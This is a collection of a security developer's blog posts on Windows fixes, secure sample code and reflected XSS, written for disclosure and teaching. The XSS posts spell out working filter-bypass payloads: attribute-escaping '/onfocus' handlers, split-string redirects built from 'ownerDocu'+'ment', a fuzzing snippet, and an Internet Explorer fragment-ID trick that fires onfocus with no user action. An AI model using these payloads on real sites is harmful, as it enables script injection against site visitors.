It should be easy enough to set up a VPN in Windows, and everything should work well, because Microsoft has been doing these sorts of things for some years.
Sure enough, if you open up the Charms bar, choose Settings, Change PC Settings, and finally Network, you're brought to this screen, with a nice big friendly button to add a VPN connection. Tapping on it leads to the following screen:
No problems, I've already got these settings ready to go.
Probably not the best idea to name my VPN settings "New VPN", but then I'm not telling you my VPN endpoint. So, let's connect to this new connection.
So far, so good. Now it's verifying my credentials…
And then we should see a successful connection message.
Not quite. For the search engines, here's the text:
Error 860: The remote access connection completed, but authentication failed because of an error in the certificate that the client uses to authenticate the server.
This is upsetting, because of course I've spent some time setting the certificate correctly (more on that in a later post), and I know other machines are connecting just fine.
I'm sure that, at this point, many of you are calling your IT support team, and they're reminding you that they don't support Windows 8 yet, citing some lame excuse about "not yet stable, official, standard, or Linux".
Don't take any of that. Simply open the Desktop.
What? Yes, Windows 8 has a Desktop. And a Command Prompt, and PowerShell. Even in the RT version.
Oh, uh, yeah, back to the instructions.
Forget navigating the desktop, just do Windows-X, and then W, to open the Network Connections group, like this:
Select the VPN network you've created, and select the option to "Change settings of this connection":
In the Properties window that pops up, you need to select the Security tab:
OK, so that's weird. The Authentication group box has two radio buttons – but neither one is selected. My grandma had a radio like that: you couldn't tell what station you were going to get when you turned it on – and the same is generally true for software. So, we should choose one:
It probably matters which one you choose, so check with your IT team (tell them you're connecting from Windows 7, if you have to).
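If you'd rather not click through the dialog at all, the same setting can be flipped from PowerShell. This is only a sketch: the connection name and authentication method below are placeholders, so substitute whatever your IT team actually tells you (the VpnClient cmdlets are available from Windows 8 onward):

```powershell
# Show the current state of the connection – note the blank AuthenticationMethod
Get-VpnConnection -Name "New VPN"

# Pick an authentication method explicitly. MSChapv2 is only an example;
# use whichever method your VPN endpoint actually expects.
Set-VpnConnection -Name "New VPN" -AuthenticationMethod MSChapv2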
Then we can connect again:
And… we're connected.
Now for another surprise: the Desktop Internet Explorer works just fine, but the "Modern UI" (formerly known as "Metro") version of IE decides it will only talk to sites inside your LAN, and won't talk to external sites. Oh, and that behaviour extends to any Metro app that embeds web content.
I'm still working on that one. News as I have it!
Every few months, something prompts me to make the tweet that:
OK, so the choice of calling these "SDKs" is rooted in my Microsoft dev background, where "sample code" didn't need documentation or bug tracking, whereas an SDK does. You can adjust the terminology to suit.
The basic point here is to remind you that you do not get to abrogate all responsibility by saying "this is sample code, you will need to add error checking and security", even if you do say it in the article – even if you say it in the comments of the sample!
Simply stated, I've seen too many cases where people have included three lines of code (or five, or twenty, the count doesn't matter) in a program, and they've stepped away and shipped that code.
"It wasn't my fault," they say, when the incident happens, "I copied that code from a sample online."
This is the point at which the re-education machine is engaged – because, of course, it totally is your fault if you include code in your development without treating it with the same rigour as if you had written every line of it yourself. You will get punished – usually by having to stay late and fix it.
It's also the sample writer's fault.
He gave you the mini-SDK that you imported blindly into your application, without testing it, without checking errors in it, without appropriate security measures, and he brushed you off with "well, of course, you should add your own error checks and security magic to it".
Here's an example of what I'm talking about, courtesy of Troy Hunt linking to an ASP forum.
No – if you're providing sample code on the Internet, it's important to make sure it doesn't embody BAD design. This is code that will be taken up by people who are, by definition, less keen, less eager, less smart and less motivated to do things right than you are – after all, rather than figuring out how to write this code for themselves, they are allowing you to do it for them, to teach them how it's done. If you then teach them how it's done badly, that's how they will learn to do it – badly. And they will teach others.
So, instead, make your three-line samples five lines, and add enough error checking that unexpected issues or other bad things will break the sample's execution.
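To make that concrete, here's an illustration in Python – the config-loading scenario and the key name are invented for the example. The "three-line sample" version would just call json.loads and index in; the shippable version checks its failure modes and stops loudly:

```python
import json

def load_config(text):
    """Parse a JSON config string, failing loudly instead of limping on."""
    try:
        config = json.loads(text)
    except json.JSONDecodeError as e:
        # A bare sample would skip this and crash somewhere far away instead
        raise ValueError(f"config is not valid JSON: {e}") from e
    if "endpoint" not in config:
        raise ValueError("config is missing required key 'endpoint'")
    return config
```

The point isn't the extra lines themselves; it's that someone who pastes this into a product inherits error handling, instead of inheriting a silent failure.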
I've been playing a lot lately with cross-site scripting (XSS) – you can tell that from my previous blog entries, and from the comments my colleagues make about me at work.
Somehow, I have managed to gain a reputation for never leaving a search box without injecting code into it.
And to a certain extent, that's deserved.
But I always report what I find, and I don't blog about it until I'm sure the company has fixed the issue.
Right – and, having known a few people who've worked in the Starbucks security team, I was surprised that I could find anything at all.
Yet it practically shouted at me, as soon as I started to inject script:
Well, there's pretty much a hint that Starbucks have something in place to prevent script.
But it's not the only thing preventing script, as I found with a different search:
So, one search takes me to an "oops" page, another takes me to a page telling me that nothing happened – but without either one executing the script.
The "oops" page doesn't include any of my script, so I don't like that page – it doesn't help my injection at all.
The search results page, however, includes some of my script, so if I can just make that work for me, I'll be happy.
Viewing source is pretty helpful, so here's what I get from that, plus searching for my injected script:
At this point, I figure that I need to find some execution that is appropriate for this context.
Maybe the XSS fish will help, so I search for that:
Looks promising – no "oops", let's check the source:
This is definitely working. At this point, I know the site has XSS; I just have to demonstrate it. If I were a security engineer at Starbucks, this would be enough to send me off to beat some heads together.
This is enough evidence that a site has XSS issues to make a developer do some work on fixing it. I have escaped the containing quotes, I have terminated/escaped the HTML tag I was in, and I have started something like a new tag. I have injected into your page, and now all we're debating is how much I can do now that I've broken in.
I have to go on at this point, because I'm an external researcher to this company. I have to deliver to them a definite breach, or they'll probably dismiss me as a waste of time.
The obvious thing to inject here is '"><script>prompt(1)</script>' – but we saw earlier that produced an "oops" page. We've seen that "prompt(1)" isn't rejected, and the angle brackets (chevrons, less-than / greater-than signs, or whatever you want to call them) aren't rejected, so it must be the word "script".
That, right there, is enough to tell me that instead of encoding the output (which would turn those angle brackets into "&lt;" and "&gt;" in the source code, while still looking like angle brackets in the display), this site is using a blacklist of "bad words to search for".
That's a really good question – and the basic answer is that you just can't make most blacklists complete. Only if you have a very limited character set, and a good reason to believe that your blacklist can be complete.
A blacklist that might work is to say that you surround every HTML tag's attributes with double quotes, and so your blacklist is double quotes, which you encode, as well as the characters used to encode, which you also encode.
I say it "might work" because, in the wonderful world of Unicode and developing HTML standards, there might be another character to escape the encoding, or a set of multiple code points in Unicode that are treated as the encoding character or double quote by the browser.
Easier by far to use a whitelist – only these few characters are safe, and ALL the rest get encoded.
You might have an incomplete whitelist, but that's easily fixed later, and at its worst is no more than a slight inefficiency. If you have an incomplete blacklist, you have a security vulnerability.
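The difference is easy to demonstrate. Below is a small sketch – my own illustration, not Starbucks' actual filter – of a blacklist that rejects known-bad substrings, next to a whitelist encoder that numerically encodes everything outside a tiny safe set. The misspelt event name sails straight past the blacklist, but the whitelist encoder neutralises it without ever needing to know it exists:

```python
import string

SAFE = set(string.ascii_letters + string.digits + " ")

def blacklist_ok(s, banned=("<script", "onmouseover", "onfocus", "alert")):
    """Blacklist: allow anything that doesn't contain a known-bad substring."""
    lowered = s.lower()
    return not any(word in lowered for word in banned)

def whitelist_encode(s):
    """Whitelist: pass only letters, digits and spaces; encode all the rest."""
    return "".join(c if c in SAFE else f"&#{ord(c)};" for c in s)
```

blacklist_ok('" onmooseover=prompt(1)') happily returns True, while whitelist_encode renders the same payload inert as '&#34; onmooseover&#61;prompt&#40;1&#41;'.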
OK, so having determined that I can't use the script tag, maybe I can add an event handler to the tag I'm in the middle of displaying, whether it's a link or an input. Perhaps I can get that event handler to work.
Ever faithful is the "onmouseover" event handler. So I try that.
You don't need to see the "oops" page again. But I did.
The weirdest thing, though, is that the "onmooseover" event worked just fine.
Except I didn't have a moose handy to demonstrate it executing.
So, that means that they had a blacklist of events, and onmouseover was on the list, but onmooseover wasn't.
Similarly, "onfocus" triggered the "oops" page, but "onficus" didn't. Again, sadly, I didn't have a ficus with me.
Sure, but then so is the community of browser manufacturers. There's a range of "ontouch" events that weren't on the blacklist, but are supported by a browser or two – and then you have to wonder if Google, maker of the Chrome browser and the Glass voice-controlled eyewear, might not introduce an event or two for eyeball tracking. Maybe a Kinect-powered browser will introduce "onwaveat". Again, the blacklist isn't future-proof. If someone invents a new event, you have to hope you find out about it before the attackers try to use it.
Then I tried adding characters to the beginning of the event name. Curious – that works.
And, yes, the source view showed me the event was being injected. Of course, the browser wasn't executing it, because of course "?onmouseover" can't be executed. The HTML spec just doesn't allow for it.
Eventually, I made my way through the ASCII table to the forward-slash character.
Yes, that's it – that executes. There's the prompt.
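That walk through the ASCII table is easy to automate. This is a sketch of the idea, not the actual tool I used; the surrounding quote-escaping is a typical shape for an injection into a double-quoted attribute:

```python
def event_fuzz_payloads(event="onmouseover", js="prompt(1)"):
    """Generate one candidate payload per printable ASCII prefix character,
    each escaping out of a double-quoted attribute before the event name."""
    payloads = []
    for code in range(0x20, 0x7F):  # the printable ASCII range
        prefix = chr(code)
        payloads.append(f'" {prefix}{event}={js} x="')
    return payloads
```

Feeding each payload to the search box and watching which ones avoid the "oops" page is what surfaces "/" as the interesting prefix here.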
Weirdly, if I used "alert" instead of "prompt", I get the "oops" page. Clearly, "alert" is on the blacklist, "prompt" is not.
I still want to make this a "hotter" report before I send it off to Starbucks, though.
Well, it'd be nice if it didn't require the user to find and wave their mouse over the page element that you've found the flaw in.
Fortunately, I'd also recently found a behaviour in Internet Explorer that allows a URL to set focus to an element on the page by its ID or name. And there's an "onfocus" event I can trigger with "/onfocus".
So, there we are – automated execution of my chosen code.
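Putting the two pieces together looks something like this. The markup, field id and URL are all invented for illustration – the real target obviously differed – but the shape of the trick is: inject a "/onfocus" handler into the input, then hand the victim a link whose fragment id points at that input, so Internet Explorer focuses the field, and fires the handler, on page load.

```html
<!-- Hypothetical reflected result: the injected text closes the value
     attribute and adds a /onfocus handler that survives the
     event-name blacklist -->
<input type="text" id="q" name="q" value="" /onfocus=prompt(1) x="">

<!-- The link for the victim: the #q fragment makes IE focus the field,
     which triggers the handler with no mouse movement required:
     https://vulnerable.example/search?q=%22+%2Fonfocus%3Dprompt(1)+x%3D%22#q -->
```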
Sure – how about something an attacker might try: a redirect to a site of their choosing. [But since I'm not an attacker, we'll do it to somewhere acceptable.]
I tried to inject "/onfocus=document.location='//google.com'" – but apparently, "document" and "location" are also on the banned list.
"ownerDocu", "ment", "loca" and "tion" aren't on the blacklist, though, so I can do this["ownerDocu"+"ment"]["loca"+"tion"]=…
Very quickly, this URL took the visitor away from the Starbucks search page and on to the Google page.
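It's worth spelling out why the concatenation works. The check below is a reconstruction – a guess at what the server was doing – but the principle holds for any substring blacklist: the submitted text only ever contains the fragments, and it's the victim's browser that glues them back into document.location at execution time:

```python
BANNED = ("script", "alert", "document", "location")

def passes_blacklist(payload):
    """Sketch of a substring blacklist: reject text containing banned words."""
    lowered = payload.lower()
    return not any(word in lowered for word in BANNED)

# The source text of the injection never contains "document" or "location" –
# the quotes and plus signs break up every banned word.
payload = 'this["ownerDocu"+"ment"]["loca"+"tion"]="//google.com"'
```

passes_blacklist(payload) is True, while the straightforward document.location version is rejected – exactly the behaviour observed above.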
Now it's ready to report.
Well, no, not really. This took me a couple of months to get reported. I tried "security@starbucks.com", which is the default address for reporting security issues.
An auto-reply comes my way, informing me this is for Starbucks staff to report [physical] security issues.
I try the webmaster@ address, and that gets me nowhere.
The "Contact Us" link takes me to a customer service representative, and an entertaining exchange that results in them telling me that they've passed my email around everyone who's interested, and the general consensus is that I should go ahead and publish my findings.
No, I'm not interested in self-publicising at the cost of someone else's security. I do this so that things get more secure, not less.
So, I reach out to anyone I know who works for Starbucks, or has ever worked for Starbucks, and finally get to someone in the Information Security team.
The Information Security team works with me politely, quickly and calmly, and addresses the problem promptly and completely. The blacklist is still there, and still takes you to the "oops" page – but it's no longer the only protection in place.
My "onmooseover" and "onficus" events no longer work, because the correct characters are quoted and encoded.
The world is made safer and more secure, and half a year later I post this article, so that others can learn from this experience, too.
By withholding publication until well after the site is fixed, I ensure that I'm not making enemies of people who might be in a position to help me later. By fixing the site quickly and quietly, Starbucks ensure that they protect their customers. And I, after all, am a customer.
The Starbucks Information Security team have also promised that there is now a route from security@ to their inbox, as well as better training for the customer service team to redirect security reports their way, rather than insisting on publishing. I think they were horrified that anyone suggested that. I know I was.
And did I ever tell you about the time I got onto Google's hall of fame?
Reading a story on the consequences of the theft of Adobe's source code by hackers, I come across this startling phrase:
The hackers seem to be targeting vulnerabilities they find within the stolen code. The prediction is that they're sifting through the code, attempting to find widespread weaknesses, intending to exploit them with maximum effect by using zero-day attacks.
What I'd love to know is why we aren't seeing a flood of developers crying out to be educated in how they, too, can learn to sift through their own code and attempt to find widespread weaknesses, so they can shore them up and prevent their code from being exploited.
An example of the sort of comments we are seeing can be found here, and they are fairly predictable – "does this mean Open Source is flawed, if having access to the source code is a security risk", schadenfreude at Adobe's misfortune, all manner of assertions that Adobe weren't a very secure company anyway, etc.
So, if you're in the business of developing software – whether to sell, licence, give away, or simply to use in your own endeavours – you're essentially in the same boat as Adobe prior to the hackers breaching their defences. Possibly the same boat as Adobe after the breach, but prior to the discovery.
Unless you are doing something different to what Adobe did, you are setting yourself up to be the next Adobe.
Obviously, Adobe isn't giving us entire details of their own security program, and what's gone right or wrong with it, but previous stories (as early as mid-2009) indicated that they were working closely with Microsoft to create an SDL (Security Development Lifecycle) for Adobe's development.
So, instead of being all kinds of smug that Adobe got hacked, and you didnât, maybe you should spend your time wondering if you can improve your processes to even reach the level Adobe was at when they got hacked.
And, to bring the topic back to what started the discussion – are you even doing to your software what these unidentified attackers are doing to Adobe's code?
How long are you spending to do that, and what tools are you using to do so?
In a classic move, clearly designed to introduce National Cyber Security Awareness Month with quite a bang, the US Government has shut down, making it questionable as to whether National Cyber Security Awareness Month will actually happen.
In case the DHS isn't able to make things happen without funding, here's what they originally had planned:
I'm sure you'll find myself and a few others keen to engage you on Information Security this month in the absence of any functioning legislators.
Maybe without the government in charge, we can stop using the "C" word to describe it.
The "C" word I'm referring to is, of course, "Cyber". Bad word. Doesn't mean anything remotely like what the people using it think it means.
The main page of the DHS.GOV web site actually does carry a small banner indicating that there's no activity happening at the web site today.
So, there may be many NCSAM events, but DHS will not be a part of them.
I admit that it's a little strange to look at your event log fairly often, but I occasionally find interesting behaviour there, and certainly whenever I encounter an unexpected error, that's where I look first.
Because that's actually where developers put information relating to problems you're experiencing.
So, when I tried to install Windows 8.1 and was told that I would be able to keep "Nothing" – no apps, no settings, etc. – I assumed there would be an error in the log.
But all I saw was this:
So, yes, that's an error with:
Event ID: 16385
Error Code: 0x80041316
The log goes back only to September 2, but that's just because the Application log it's in has already run out of room and "rolled over" with too many entries. Presumably, then, the occurrence that caused this was prior to that.
Searching online, I find that there are some others who have experienced the same thing, the most recent of which is in January 2013, and who posted of this error to the TechNet forums.
A Microsoft representative had answered indicating that the cause could be (of all strange things) a partition with no name. Odd. Then they suggested Refreshing or Reinstalling the PC.
I'm not reinstalling unless there's something hugely wrong, and the refresh didn't help at all.
So, on to tracing the cause of the problem.
"Schedule" suggests it might be a Task Scheduler issue, and sure enough, when I open up the Task Scheduler (it's under the Administrative Tools in the Control Panel, which makes it very hard to find in Windows 8), I get the following error:
Or, for the search engines to find – title: "Task Scheduler", text: "Task SvcRestartTask: The task XML contains an unexpected node."
It's a matter of fairly simple searching (as an Administrator, naturally) to find this file "SvcRestartTask" under C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform.
So I moved this file to a document SvcRestartTask.xml in a different folder.
Time to edit it.
Among other lines in the file, these stood out:
Odd – two values for Priority, one numeric, one text. So I went hunting in a file from a system that didn't have that problem. I found these lines in the same place:
So, clearly something had written to the SvcRestartTask file with incorrect names for these elements. Changing them around in my XML version of the file, I reopened the Task Scheduler UI, navigated down to Microsoft / Windows / SoftwareProtectionPlatform, and imported the XML file there. [This is under "Actions", but you can also right-click the SoftwareProtectionPlatform folder and select "Import", then "Refresh".]
Sadly, this wasn't quite the end of things, because the Task Scheduler UI fails to talk to the Task Scheduler service. Nor can I restart the Task Scheduler service directly.
So a restart will take care of that – and sure enough, now that I've restarted, I see no more of these 16385 errors from Security-SPP.
It's just a shame it took so long to get this answer, and that the Microsoft-supplied answer in the forums is incomplete.
Oh, and of course, one last thing – what does SPP (Software Protection Platform) actually do?
Since this is an element of the Windows Genuine Advantage initiative, with the goal of preventing use of pirated copies of Windows, you might consider that you don't really need or want it around. Either way, you definitely don't want it clearing your Application event log out every three weeks!
I've done a fair amount of developer training recently, and it seems like there are a number of different kinds of responses to my security message.
[You can safely assume that there's also something that's wrong with the message and the messenger, but I want to learn about the thing I likely can't control or change – the supply of developers.]
Here are some unfairly broad descriptions of stereotypes I've encountered along the way. The truth, as ever, is more nuanced, but I think if I can reach each of these target personas, I should have just about everyone covered.
Is there anyone I've missed?
I'm always happy to have one or more of these people in the room – the sort of developer who has some experience, and has been on a project that was attacked successfully at some point or another.
This kind of developer has likely learned quickly that even his own code is subject to attack, vulnerable and weak to the persistent probes of attackers. Perhaps his experience has also included examples of his own failures in more ordinary ways – mere bugs, with no particular security implications.
Usually, this will be an older developer, because experience is required – and his tales of terror, unrehearsed and true, can sometimes provide the "scared straight" lesson I try to deliver to my students.
This guy is usually a smart, younger individual. He may have had some previous nefarious activity, or simply researched security issues by attacking systems he owns.
But for my purposes, this guy can be too clever, because he distracts from my talk of "least privilege" and "defence in depth" with questions about race conditions, side-channel attacks, sub-millisecond time deltas across multi-second latency routes, and the like. If those were the worst problems we see in this industry, I'd focus on them – but sadly, sites are still vulnerable to simple attacks, like my favourite: reflected XSS in the search field. [Simple exercise – watch a commercial break, and see how many of the sites advertised there have this vulnerability in them.]
But I like this guy for other reasons – he's a possible future hire for my team, and a probable future assistant in finding, reporting and addressing vulnerabilities. Keeping this guy interested and engaged is key to making sure that he tells me about his findings, rather than sharing them with friends on the outside, or exploiting them himself.
Unbelievably to me, there are people who have "done a project on it", and therefore know all they want to about security. If what I was about to tell them was important, they'd have been told it by their professor at college, because their professor knew everything of any importance.
I personally wonder if this is going to be the kind of SDE who will join us for a short while and not progress – because the impression they give me is that they finished learning right before their last final exam.
Related to the previous category is the developer who only does what it takes to get paid and to receive a good performance review.
I think this is the developer I should work the hardest to try and reach, because this attitude lies at the heart of every developer on their worst days at their desk. When the passion wanes, or the task is uninteresting, the desire to keep your job, continue to get paid, and progress through your career while satisfying your boss is the grinding cog that keeps you moving forward like a wind-up toy.
This is why it is important to keep searching for ways of measuring code quality, and rewarding people who exhibit it – larger rewards for consistent, prolonged improvement; smaller but more frequent rewards to keep the attention of the developer who makes a quick improvement to even a small piece of code.
Sadly, this guy is in my class because his boss told him he ought to attend. So I tell him at the end of my class that he needs to report back to his boss the security lesson that he learned – that all of his development-related goals should have the adverb "securely" appended to them. So "develop feature X" becomes "develop feature X securely". If that is the one change I can make to this developer's goals, I believe it will make a difference.
I've been doing this for long enough that I see the same faces in the crowd over and over again. I know I used to be a fanboy myself, and so I'm aware that sometimes this is because these folks learn something new each time. That's why I like to deliver a different talk each time, even if it's on the same subject as a previous lesson.
Or maybe they just didn't get it all last time, and need to hear it again to get a deeper understanding. Either way, repeat visitors are definitely welcome – but I won't get anywhere if that's all I get in my audience.
Some developers do the development thing because they can't NOT write code. If they were independently wealthy and could do whatever they wanted, they'd be behind a screen coding up some fun little app.
I like the ones with a calling to this job, because I believe I can give them enough passion in security to make it a part of their calling as well. [Yes, I feel I have a calling to do security – I want to save the world from bad code, and would do it even if I were independently wealthy.]
Sadly, the hardest person to reach – harder even than the Salaryman – is the developer who matches the stereotypical perception of the developer mindset.
Convinced of his own superiority and cleverness, even if he doesn't express it directly in such conceited terms, this person will see every suggested approach as beneath him, and every example of poor code as yet more proof of his own superiority.
"Sure, you've had problems with other developers making stupid security mistakes," he'll think to himself, "but I'm not that dumb. I've never written code that bad."
I certainly hope you won't ever write code as bad as the examples I give in my classes – those are errant samples of code written in haste, which I wouldn't include in my class if they didn't clearly illustrate my point. But my point is that your colleagues – everyone around you – are going to write this bad a piece of code one day, and it is your job to find it. It is also their job to find it in the code you write, so either you had better be truly as good as you think you are, or you had better apply good security practices so they don't find you at your worst coding moment.
I've found a new weekend hobby – it takes only a few minutes, is easily interruptible, and reminds me that the state of web security is such that I will never be out of a job.
I open my favourite search engine (I'm partial to Bing, partly because I get points, but mostly because I've met the guys who built it), search for "security blog", and then pick one at random.
Once I'm at the security blog site – often one I've never heard of, despite it being high up in the search results – I find the search box and throw a simple reflected XSS attack at it.
If that doesn't work, I view the source code of the results page I got back, and use the information I see there to figure out what reflected XSS attack will work. Then I try that.
[Note: I use reflected XSS because I know I can only hurt myself. I don't play stored XSS or SQL injection games, which can easily cause actual damage at the server end, unless I have permission and I'm being paid.]
Finally, I try to find who I should contact about the exploitability of the site.
It's interesting just how many of these sites are exploitable – some of them falling to the simplest of XSS attacks – and even more interesting to see how many sites don't have a good, responsive contact address (or simply prefer not to engage with vuln discoverers).
I clearly wouldn't dream of disclosing any of the vulnerabilities I've found until well after they're fixed. Of course, after they're fixed, I'm happy to see a mention that I've helped move the world forward a notch on some security scale. [Not sure why I'm not called out on the other version of that changelog.] I might allude to them on my twitter account, but not in any great detail.
From clicking the link to exploit is either under ten minutes or not at all – and reporting generally takes another ten minutes or so, most of which is hunting for the right address. The longer portion of the game is helping some of these guys figure out what action needs to be taken to fix things.
You can try using a WAF to solve your XSS problem, but then you've got two problems – a vulnerable web site, and having to manage your WAF settings. If you have a lot of spare time, you can use a WAF to shore up known-vulnerable fields and trap known attack strings. But it doesn't ever really fix the problem.
If you can, don't echo back to me what I sent you, because that's how these attacks usually start. Don't even include it in comments, because a good attack will just terminate the comment and start injecting HTML or script.
Unless you're running a source code site, you probably don't need me to search for angle brackets, or a number of other characters. So take them out of my search – or plain reject it if I include them.
OK, so you don't have to encode the basics – but what are the basics? I tend to start with alphabetic and numeric characters, maybe also a space. Encode everything else.
Yeah, that's always the hard part. Encode it using the right encoding. That's the short version. The long version is that you figure out what's going to decode it, and make sure you encode for every layer that will decode. If you're putting my text into a web page as part of the page's content, HTML-encode it. If it's in an attribute string, quote the characters using HTML attribute encoding – and make sure you quote the entire attribute value! If it's an attribute string that will be used as a URL, you should URL-encode it. Then you can HTML-encode it, just to be sure.
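In Python terms – and as a sketch only, since real web frameworks ship their own encoders, which you should prefer – layering looks like this: URL-encode for the innermost decoder first, then HTML-encode for the outermost:

```python
from html import escape
from urllib.parse import quote

def encode_for_body(user_input):
    """Untrusted text going into HTML element content: HTML-encode it."""
    return escape(user_input, quote=False)

def encode_for_href(user_input):
    """Untrusted text going into an href attribute: URL-encode for the URL
    parser (the innermost decoder), then HTML-encode for the attribute
    parser (the outermost decoder)."""
    return escape(quote(user_input, safe=""), quote=True)
```

encode_for_body('<script>') gives '&lt;script&gt;', and encode_for_href('"><script>') gives '%22%3E%3Cscript%3E' – inert at both layers.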
[Then, of course, check that your encoding hasn't killed the basic function of the search box!]
You should definitely respond to security reports. I understand that not everyone can have a 24/7 response team watching their blog (I certainly don't), but you should try to respond within a couple of days, and anything under a week is probably going to be alright. Some vuln discoverers are upset if they don't get a response much sooner, and see that as cause to publish their findings.
Me, I send a message first to ask if I've found the right place to send a security vulnerability report to, and only when I receive a positive acknowledgement do I send on the actual details of the exploit.
I've said before that I wish programmers would respond to reports of XSS as if I'd told them I caught them writing a bubble sort implementation in Cobol. Full of embarrassment at being such a beginner.
I hope this is original, I certainly couldn’t find anything in a quick bit of research on “Internet Explorer”, “anchor” / “fragment id” and “onfocus” or “focus”. [Click here for the TLDR version.]
Those of you who know me, or have been reading this blog for a while know that I have something of a soft spot for the XSS exploits (See here, here, here and here – oh, and here). One of the reasons I like them is that I can test sites without causing any actual damage to them – a reflected XSS that I launch on myself only really affects me. [Stored XSS, now that’s a different matter] And yet, the issues that XSS brings up are significant and severe.
XSS issues are significant and severe because:
So, I enjoy reporting XSS issues to web sites and seeing how they fix them.
It’s been said I can’t pass a Search box on a web site without pasting in some kind of script and seeing whether I can exploit it.
So, the other day I decided for fun to go and search for “security blog” and pick some entries at random. The first result that came up – blog.schneier.com – seemed unlikely to yield any fruit, because, well, Bruce Schneier. I tried it anyway, and the search box goes to an external search engine, which looked pretty solid. No luck there.
A couple of others – and I shan’t say how far down the list, for obvious reasons – turned up trumps. Moderately simple injections into attributes in HTML tags on the search results page.
One only allowed me to inject script into an existing “onfocus” event handler, and the other one allowed me to create the usual array of “onmouseover”, “onclick”, “onerror”, etc handlers – and yes, “onfocus” as well.
I reported them to the right addresses, and got the same reply back each time – this is a “low severity” issue, because the user has to take some action, like wiggling the mouse over the box, clicking in it, etc.
Could I raise the severity, they asked, by making it something that required no user interaction at all, save for loading the link?
Could I make the attack more “sexy”?
Whenever I’m faced with an intellectual challenge like that, I find that often a good approach is to simply try something stupid. Something so stupid that it can’t possibly work, but in failing it will at least give me insight into what might work.
I want to set the user’s focus to a field, so I want to do something a bit like “go to the field”. And the closest automatic thing that there is to “going to a field” in a URL is the anchor portion, or “fragment id” of the URL.
You’ll have seen them, even if you haven’t really remarked on them very much. A URL consists of a number of parts:
The anchor is often called the “hash”, because it comes after the “hash” or “sharp” or “pound” (if you’re not British) character. [The query often consists of sets of paired keys and values, like “key1=value1&key2=value2”, etc]
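As a concrete illustration of those parts, here is a quick sketch using Python’s standard `urllib.parse` module (the example URL is made up; the component names follow Python’s terminology, where the anchor is called the “fragment”):

```python
from urllib.parse import urlsplit

# Split an example URL into its component parts.
parts = urlsplit("https://www.example.com/some/path?key1=value1&key2=value2#foobar")

print(parts.scheme)    # https
print(parts.netloc)    # www.example.com
print(parts.path)      # /some/path
print(parts.query)     # key1=value1&key2=value2
print(parts.fragment)  # foobar  <- the anchor, after the "#"
```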
The purpose of an anchor is to scroll the window to bring a specific portion to the top. So, you can give someone a link not just to a particular page, but to a portion of that page. It’s a really great idea. Usually an anchor in the URL takes you to a named anchor tag in the page – something that reads “<a name=foobar></a>” will, for instance, be scrolled to the top whenever you visit it with a URL that ends with “#foobar”.
[The W3C documentation only states that the anchor or fragment ID is used to “visit” the named tag. The word “visit” is never actually defined. Common behaviour is to load the page if it’s not already loaded, and to scroll the page to bring the visited element to the top.]
This anchor identifier in the URL is also known as a “fragment identifier”, because technically the “anchor” is the entire URL; common usage, though, applies the term to just the part after the “#”.
XSS fans like myself are already friendly with the anchor identifier, because it has the remarkable property of never being sent to the server by the browser! This means that if your attack depends on something in the anchor identifier, you don’t stand much chance of being detected by the server administrators.
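You can see why the server never learns the fragment by building the request target a browser would actually send: only the path and query go on the wire. A sketch (the URL here is hypothetical):

```python
from urllib.parse import urlsplit

url = "https://victim.example/search?q=hello#vulnerablefield"
parts = urlsplit(url)

# The request line a browser sends contains only the path and query;
# the fragment is handled entirely client-side and never leaves the machine.
request_target = parts.path + ("?" + parts.query if parts.query else "")
print(request_target)  # /search?q=hello
```

So anything the attack carries in the fragment is invisible to the server’s logs.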
So, the stupid thing that I thought about was: “Does this work for any name? And is it the same as focus?”
Sure enough, in the W3C documentation for HTML, here it is:
So, that means any tag with an “id” attribute can be scrolled into view. This effectively applies to any element with a “name” attribute too, because:
This attribute [name] names the current anchor so that it may be the destination of another link. The value of this attribute must be a unique anchor name. The scope of this name is the current document. Note that this attribute shares the same name space as the id attribute. [my emphasis]
This is encouraging, because all those text boxes already have to have ids or names to work.
So, we can bring a text box to the top of the browser window by specifying its id or name attribute as a fragment.
That’s the first stupid thing checked off and working.
But moving a named item to the top of the screen isn’t the same as selecting it, clicking on it, or otherwise giving it focus.
Or is it?
Testing in Firefox, Chrome and Safari suggested not.
Testing in Internet Explorer, on the other hand, demonstrated that versions as old as IE8, all the way through IE9 and IE10, trigger focus behaviour – including any “onfocus” handler – when the fragment names the element.
Internet Explorer has a behaviour different from other browsers which makes it easier to exploit a certain category of XSS vulnerabilities in web sites.
If a vulnerable site allows an attacker to inject code into an “onfocus” handler (new or existing), the attacker can force visitors to trigger that “onfocus” event, simply by adding the id or name of the vulnerable HTML tag to the end of the URL as a fragment ID.
You can try it if you like – using the URL http://www.microsoft.com/en-us/default.aspx#ctl00_ctl16_ctl00_ctl00_q
OK, so you clicked it and it didn’t drop down the menu that normally comes when you click in the search field on Microsoft’s front page. That’s because the onfocus handler wasn’t loaded when the browser set the focus. Try reloading it.
You can obviously build any number of test pages to look at this behaviour:
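The original code listing appears to be missing here; a minimal reconstruction consistent with the text (the names “exploit” and “exploitid” come from the next paragraph, the rest is assumed) might look like:

```html
<!-- formpage.html: a minimal page demonstrating IE's fragment-ID
     focus behaviour. Visiting formpage.html#exploit (by name) or
     formpage.html#exploitid (by id) gives the field focus in IE,
     firing its onfocus handler with no user interaction. -->
<html>
<body>
<form>
  <input type="text" name="exploit" id="exploitid"
         onfocus="alert('onfocus fired without user interaction')">
</form>
</body>
</html>
```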
Loading that with a link to formpage.html#exploit or formpage.html#exploitid will pop up an ‘alert’ dialog box.
Is this a security flaw in Internet Explorer? No, I don’t think it is – I don’t know that it’s necessarily even a flaw.
The documentation I linked to above only talks about the destination anchor being used to “visit” a resource. It doesn’t even say that the named anchor should be brought into view in any way. [Experiment: what happens if the ID in the fragment identifier is a “type=hidden” input field?]
It doesn’t say you should set focus; it also doesn’t say you should not set focus. Setting focus may be simply the most convenient way that Internet Explorer has to bring the named element into view.
And the fact that it makes XSS exploits a little easier doesn’t make it a security flaw either – the site you’re visiting STILL has to have an XSS flaw on it somewhere.
Finally, the moral question has to be asked and answered.
I start by noting that if I can discover this, it’s likely a few dozen other people have discovered it too – and so far, they’re keeping it to themselves. That seems like the less-right behaviour – because now those people are going to be using this on sites unaware of it. Even if the XSS injection is detected by the web site through looking in their logs, those same logs will tell them that the injection requires a user action – setting focus to a field – and that there’s nothing causing that to happen, so it’s a relatively minor issue.
Except it’s not as minor as that, because the portion of the URL that they CAN’T see is going to trigger the event handler that just got injected.
